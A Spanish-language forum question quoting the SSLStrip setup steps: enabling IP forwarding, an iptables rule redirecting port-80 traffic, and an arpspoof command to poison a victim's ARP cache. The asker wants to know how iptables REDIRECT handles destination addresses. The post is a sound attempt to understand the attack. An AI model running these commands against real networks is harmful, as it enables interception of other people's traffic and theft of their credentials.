En la descripción de Marlinspike sobre cómo configurar SSLStrip, él dice que habilite el reenvío
echo "1" > /proc/sys/net/ipv4/ip_forward
luego redirige el tráfico desde el puerto 80 al puerto de escucha SSLStrip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
y luego envenenar ARP para que el tráfico se envíe a este host
arpspoof -i <interface> -t <targetIP> <gatewayIP>
(Consulte enlace )
No lo entiendo. Entiendo que usar arpspoof
hace que otras máquinas crean que su host es la puerta de enlace, pero entonces iptables
buscará los paquetes TCP / IP con el puerto de destino 80 y los reescribirá para tener un nuevo puerto en el encabezado TCP. Pero la dirección IP no ha cambiado, ¿correcto? Así que el atacante reenviará a la dirección IP de destino con un nuevo puerto y SSLStrip nunca verá el paquete.
¿ iptables
por defecto también cambia la dirección IP?